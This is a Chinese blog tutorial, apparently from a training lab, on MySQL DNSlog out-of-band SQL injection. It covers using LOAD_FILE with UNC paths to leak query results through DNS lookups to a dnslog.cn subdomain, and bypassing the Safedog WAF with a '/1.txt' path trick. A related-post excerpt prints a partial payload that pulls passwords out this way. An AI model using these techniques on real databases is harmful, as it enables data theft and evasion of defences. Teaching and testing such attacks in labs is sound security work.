MySQL注入-Dns_log注入

最新推荐文章于 2024-05-29 14:50:04 发布
最新推荐文章于 2024-05-29 14:50:04 发布
阅读量268 收藏
点赞数 2
文章标签: mysql 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51313985/article/details/117002794
版权

在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。
对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被Ban
所以可以将select到的数据发送给一个url,利用dns解析
产生的记录日志来查看数据。
Dns-log
=>DNS域名解析协议=>将域名转化为IP
log=>日志(记录的东西)
Dns的日志
外带数据(oob)–>这里是一个延时盲注
我让数据库去访问某个网站,然后那个网站记录了下来

LOAD_FILE()读取文件的函数
读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。该文件所有字节可读,但文件内容必须小于max_allowed_packet(限制server接受的数据包大小函数,默认1MB)。如果该文件不存在或无法读取,因为前面的条件之一不满足,函数返回NULL。
这个功能不是默认开启的,需要在mysql配置文件加一句secure_file_priv=

通过网上邻居的SMB服务这里要引出一个叫做UNC路径的概念
UNC路径通用命名规则,也称通用命名规范、通用命名约定。
什么是UNC路径?
UNC路径就是类似lIsofter这样的形式的网络路径。它符合\servername\sharename格式,其中servername是服务器名,sharename是共享资源的名称。
目录或文件的UNC名称可以包括共享名称下的目录路径,格式为:\servername\sharename\directory\filename。
例如softer计算机的名为it168的共享文件夹,用UNC表示就是\softer\it168。我们熟悉的命令行访问法访问网上邻居,实际上应该称作UNC路径访问法。不过UNC路径也可以这样写//servername/sharename[强烈建议这样写]
SMB服务我们是怎么使用?
例如:\().zkaq.cn\abc ·=> 我们通过SMB服务取请求a.zkaq.cn那台机器下的abc文件夹
不是每个人都有自己的域名和DNS服务器,我们可以借助Dns_log这个平台
在这里插入图片描述
上面我们看到unc使用斜杠和反斜杠都行,为什么推荐使用斜杠,因为反斜杠可能存在一个转义的效果如果想保证无误前面得使用四个反斜杠,后面要两个

不多说,上题!
在这里插入图片描述
在这里插入图片描述
?????啥玩意,上来就是安全狗…
没办法,绕吧:
1、绕过他的规则
2、绕过他的检测
大部分安全狗=>通用型WAF=>并不是定制化的。

这里牵扯出了黑白名单和中间件
黑白名单:
黑名单:名单的内的东西不允许xxx,名单之外的都不管
白名单:只有名单内的东西才可以xxx
安全狗:
白名单:
1.txt的文件不检测
例如:http:/ /59.63.200.79:8014/index3.php/1.txt => web容器(apache iis nginx)
apache =>从右往左读取,遇到不存在的看不懂的东西会往前去读取
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
接着查
在这里插入图片描述
在这里插入图片描述
就按照这么找就行了,concat拼接的就是斜杠加子查询加域名,记得是以a.60fp8m.dnslog.cn的三级域名形式

本次到这里结束
未完待续…

bay0net
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
84.网络安全渗透测试—[SQL注入篇23]—[高级注入技巧-dnslog回显注入]
qwsn
01-21 4332
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、高级注入技巧 dnslog回显注入 1、原理 2、dnslog平台 3、MySQL dnslog回显注入示例: 4、SQLSERVER dnslog回显注入示例: 5、总结:
mysql dnslog_dnslog小技巧
weixin_28738165的博客
01-27 779
一、dnslog利用场景主要针对无回显情况。Sql-BlindRCESSRFRFI(Remote File Inclusion)二、原理将dnslog平台中的特有字段payload带入目标发起dns请求,通过dns解析将请求后的关键信息组合成新的三级域名带出,在ns服务器的dns日志中显示出来。三、案例展示1.sql盲注普通的注入输入 1' and '1'='1,查询成功,1' and '1'=...
MySQL注入Dns 注入
最新发布
baimaozi008的博客
05-29 985
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。然后1806dl.dnslog.cn的子域名的解析都是在某台服务器,然后他记录下来了有人请求访问了error.1806dl.dnslog.cn,然后在DnsLog这个平台上面显示出来了。
Mysql注入——DNS注入
m0_55854679的博客
02-17 2032
DNSlog【解决繁琐的盲注】介绍 DNS => 域名解析 LOG => 日志 dns-log => 域名解析日志【记录别人来查询域名和ip的对应】 DNSlog使用场景 在某些无法直接利用漏洞获得回显情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban,所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 DNS
SQL DNSlog注入详解
永远是少年
08-07 1316
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL DNSlog注入。 一、SQL DNSlog注入简介 二、SQL DNSlog注入实战
mysql dnslog_DNSlog盲注
weixin_33365844的博客
01-27 303
前言在渗透测试中,经常遇到如下情景:1,sql盲注2,blind型ssrf以及xxe3,无回显命令执行漏洞...dnslog盲注原理开放的DNSlog平台:http://ceye.io/在http://ceye.io/上我们可以获取到有关ceye.io的DNS查询信息。域名解析的过程,是由顶级域名向下逐级解析。我们构造的攻击语句也是如此,当它发现域名中存在ceye.io时,它会将这条域名信息转到相...
audit-plugin-mysql-5.7-1.1.4-725-linux-x86_64.zip
09-13
"audit-plugin-mysql-5.7-1.1.4-725-linux-x86_64.zip"这个压缩包文件包含了针对MySQL 5.7版本的审计插件,版本号为1.1.4-725,适用于Linux操作系统,且是64位架构。在本篇中,我们将深入探讨MySQL审计插件的安装、...
audit-plugin-mysql-5.7-1.1.7-921-linux-x86_64.zip
04-25
"audit-plugin-mysql-5.7-1.1.7-921-linux-x86_64.zip" 文件是一个针对Linux 64位系统的特定版本审计插件,适用于MySQL 5.7版本。 审计插件的主要功能包括: 1. **活动记录**:审计插件能够详细记录所有SQL语句,...
mysql-5.7.35-linux-glibc2.12-x86_64.tar.gz
08-13
这个压缩包文件“mysql-5.7.35-linux-glibc2.12-x86_64.tar.gz”包含了适用于Linux系统的MySQL 5.7.35版本,这是一个64位的二进制分发版。MySQL 5.7版本在性能、可扩展性和安全性方面都有显著提升,例如引入了InnoDB...
mysql2_query_filter-plugin-casual_log:为 Mysql2QueryFilter 的错误查询着色的插件
06-05
gem 'mysql2_query_filter-plugin-casual_log' 然后执行: $ bundle 或者自己安装: $ gem install mysql2_query_filter-plugin-casual_log 用法 require 'mysql2_query_filter' Mysql2QueryFilter . ...
mysql-5.7.20-linux-glibc2.12-x86_64.tar.gz(安装步骤).txt
11-08
mysql-5.7.20-linux-glibc2.12-x86_64.tar.gz(安装步骤).txt 截至2017.11.08最新新mysql for linux的安装步骤。 glibc版本是不需要make的。 所以选择这个安装包不需要任何依赖包,包你100%安装成功
mysql dns 注入_DNSlog应用
weixin_36296215的博客
01-27 204
————背景说明————在做渗透的时候,有一些漏洞发现无回显的,比如sql注入,一般当我们拿到一个无回显注入,那么我们往往会采用盲注,使用二分法不断猜测字符等方式来取信息,不过这样的方式耗时又费力,而且频繁地测试容易被目标网站ban掉。那么面对盲注,或者是其他漏洞的盲打,有没有哪种方法,可以快速地获取我们需要的信息呢,答案是有的,即本篇主要说的,利用DNS快速获取数据,官方地讲即DNSlog。这...
mysql配置执行日志及防止sql注入
m0_64288219的博客
07-11 567
1、错误日志 log_error (主要是记录启动、运行、停止mysql时出现的致命问题,系统级别的错误记录) 2、查询日志 log (主要记录数据库建立的客户端连接和执行的语句) 3、二进制日志 log_bin (主要是记录所有的更改数据的语句,可使用mysqlbinlog命令恢复数据) 4、慢日志 log_slow_queries (主要是记录所有执行时间超过long_query_time的查询或没有使用索引的查询) 5、更新日志 log_update(官方建议不开启,在此忽略) 在安装mysql的文件
mysql注入---DNSLOG注入
nini_boom的博客
07-21 564
不一定学习进度速度快,就代表掌控的东西就多。学习的目标在于对于理解的知识深度和广度,速度快会有很多时间学习广度的东西,但在有限广度的情况下,理解的深度才是更重要的,所以在这种情况下,不要在意学习的进度,把握住学习的节奏,向更深处理解。扎下深根的竹子,在疯狂生长的时候才有更多的后备力量。 0x01 DNSLOG注入 当我们遇到了盲注、延时注入时,页面没有具体的返回。 但是盲注、延时注入需要进行大...
DNSlog实现Mysql注入
weixin_30883777的博客
03-22 262
step1: 通过DNSlog盲注需要用到load_file()函数。show variables like '%secure%' 查看load_file()可以读取的磁盘。 1、当secure_file_priv为空,就可以读取磁盘的目录。 2、当secure_file_priv为G:\,就可以读取G盘的文件。 3、当secure_file_priv为null,load_file就不...
17、注入篇--DNS注入MySQL
WX公众号-小白学安全
04-10 842
DNS注入 DNS注入也称DNS带外注入DNSLog注入 DNSDNS(Domain Name System)域名系统,将域名与IP地址相互映射的一个分布式数据库 DNS注入核心是 将盲注变为显错注入 DNS-logDNS服务器的解析记录 注入基础 1、load_file() 读取文件的函数 ​ 读取文件并返回文件内容为字符串 ​ 要使用此函数文件必须位于主服务器上,必须指定完整路径的文件,而且必须有file权限 ​ 该文件所有字节可读,但文件内容必须小于max_allower_packe
mysql数据库中的骚姿势-dnslog注入原理
m0_46304840的博客
05-27 2352
前言 我以为我写过dns注入了,结果我心血来潮看看博客,发现我居然还没有写 那么我就写一下 0x01.Dns注入原理 什么是dns? 例子:我们去访问 www.baidu.com,这时候dns会吧 www.baidu.com 这个域名转换为 IP地址 Dns其实就是负责把域名转换为IP地址 如果还不懂的话点击 点击这里查看 Dns在域名解析时会留下域名和解析ip的记录,利用这点我们可以使用Dnslog(日志)记录显示我们的 注入结果 dnslog注入原理 通过子查询,将内容拼接到域名内,让load_f
如何低成本搭建dnslog服务器
weixin_34315485的博客
05-25 2348
DNSLog,简单来说,就是通过记录对于域名的DNS请求,通过dns请求这个相对“隐蔽”的渠道,来委婉地获取到想要获得的信息。 例如,在一个针对mysql数据库的注入中,如果没有回显,可能很多时候就要歇菜。 但如果对方的数据库服务器连接公网并且是Windows机器的话,就可以用这种姿势来获取信息: SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FR...
cmake . -DCMAKE_INSTALL_PREFIX=/usr/local/mysql -DMYSQL_DATADIR=/usr/local/mysql/data -DSYSCONFDIR=/etc -DWITH_MYISAM_STORAGE_ENGINE=1 -DWITH_INNOBASE_STORAGE_ENGINE=1 -DWITH_MEMORY_STORAGE_ENGINE=1 -DWITH_READLINE=1 -DENABLED_LOCAL_INFILE=1 -DMYSQL_UNIX_ADDR=/var/lib/mysql/mysql.sock -DMYSQL_TCP_PORT=3306 -DWITH_SSL=system -DWITH_ZLIB=system -DWITH_LIBWRAP= -DDEFAULT_CHARSET=utf8 -DDEFAULT_COLLATION=utf8_general_ci
06-09
- `-DMYSQL_UNIX_ADDR=/var/lib/mysql/mysql.sock`:指定 MySQL 的 Unix 套接字文件的路径为 `/var/lib/mysql/mysql.sock`。 - `-DMYSQL_TCP_PORT=3306`:指定 MySQL 的 TCP 端口号为 3306。 - `-DWITH_SSL=system`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值